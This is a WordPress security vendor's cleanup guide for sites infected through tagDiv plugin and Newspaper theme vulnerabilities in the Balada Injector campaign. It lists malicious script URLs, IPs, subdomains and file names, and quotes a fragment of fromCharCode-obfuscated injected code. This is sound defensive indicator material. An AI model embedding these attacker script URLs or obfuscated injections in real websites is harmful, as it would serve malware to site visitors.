According to the PublicWWW engine, there are approx. 81513 sites using the Newspaper theme and tagDiv plugin – more than 4600 sites still show signs of contamination.
MAGEFIX SecurityMalware cleanup & protectionTry our Free site check.
How to clean a website affected by tagDiv and Newspaper vulnerabilities.
- Backup the infected site, including database and web files – keep everything, including any suspicious file.
- Restore core files, plugins and themes, one by one, manually, making sure you’ll not use any files from the backup – start fresh. You may restore wp-config.php after a quick check.
- Make sure the /uploads/ folder is malware-free, look for .php & .zip files.
- After you got back a working WordPress site, check the dashboard and remove any suspicious admin users.
- Backup and review the wp_options table, it should include obfuscated code. Find and remove any malicious injection.
- Ask for a reindex via Google search console.
- Apply all the security updates available and use PHP version 7.4 or greater.
- Use Search Replace DB ver. 4.1.3 to replace malicious code inside wp_options.
- Scan all the sites hosted on the same server for cross-site contamination. If other sites are affected, isolate them and repeat the cleanup process for each.
If you seek professional help with cleanup and security updates, check our Platinum plan.
https://members.magefix.com/product/platinum/
Malicious URLs:
https://where.selectofmychoices.com/scripts/step.js
https://gate.getmygateway.com/select
https://west.statisticplatform.com/stats
https://good.playerofsunshine.com/scripts/start.js
hxxps://good.playerofsunshine[.]com/scripts/post.js
https://normal.playerofsunshine.com/scripts/start.js
https://cdn.statisticscripts.com/stats/get.js
https://here.selectofmychoices.com/scripts/get.js
https://try.selectofmychoices.com/script/start.js
https://best.playerofsunshine.com/scripts/cdn.js
https://fourth.gybritanalytsesystem.com/scripts/start.js
https://fifth.gybritanalytsesystem.com/script/step.js
https://content.streamfastcdn.com
Malicious IPs: 185.39.206.161, 80.66.79[.](247|253) Hyper Hosting SRL
Malicious subdomains
80.66.79.250
store.bestselllerservice.com
80.66.79.251
follow.forwardstarlight.com
stay.forwardstarlight.com
west.statisticplatform.com
80.66.79.252
get.promsmotion.com
show.bridgelinering.com
net.promsmotion.com
go.bridgelinering.com
80.66.79.253
gate.getmygateway.com
get.lightsteper.com
cdn.specialtaskevents.com
page.specialnewspaper.com
80.66.79.249
special.beatifulllhistory.com
80.66.79.248
west.statisticplatform.com
goto.betradingway.com
give.selectchoise.com
north.statisticplatform.com
got.selectchoise.com
startup.betradingway.com
80.66.79.247
call.getsmallcount.com
get.statisticplatform.com
got.statisticplatform.com
come.statisticplatform.com
bee.selectofmychoices.com
best.playerofsunshine.com
fourth.gybritanalytsesystem.com
was.selectofmychoices.com
where.selectofmychoices.com
normal.playerofsunshine.com
good.playerofsunshine.com
try.selectofmychoices.com
great.playerofsunshine.com
third.gybritanalytsesystem.com
here.selectofmychoices.com
second.gybritanalytsesystem.com
fifth.gybritanalytsesystem.com
first.gybritanalytsesystem.com
excelent.playerofsunshine.com
fromCharCode obfuscated code inside tdw-css-placeholder:
[‘fr’+’om’+String.fromCharCode(67
Malicious files & plugin folders: zexit.zip, wp-zexit, wp-swamp.
wp-admin/js/custom-header.js, wp-includes/script-loader.js, wp-includes/js/wp-custom-header.js
SiteCheck Sucuri
Malware Found, Known javascript malware: malware.injection?35.54
Known malware: malware.injection?35.59
How this malware works:
Balada Injector Targets Unpatched tagDiv Plugin, Newspaper Theme & WordPress Admins
Twitter @500mk500
#Balada malware campaign
forwardstarlight\.com
selectchoise\.com
statisticplatform\.comsubs:
follow.forwardstarlight\.com
give.selectchoise\.com
got.selectchoise\.com
north.statisticplatform\.com
stay.forwardstarlight\.com
west.statisticplatform\.comIPs: 80.66.79[.](248|251) https://t.co/XsXkPHhvbE
— Mikhail Kasimov (@500mk500) October 9, 2023
Decoded malware
Decoded west.statisticplatform[.]com/stats script. Same idea as in the promsmotion[.]com scripts described here https://t.co/BYpWYYulOR https://t.co/K5n33RJcG8 pic.twitter.com/DQacTJTrin
— Denis (@unmaskparasites) October 9, 2023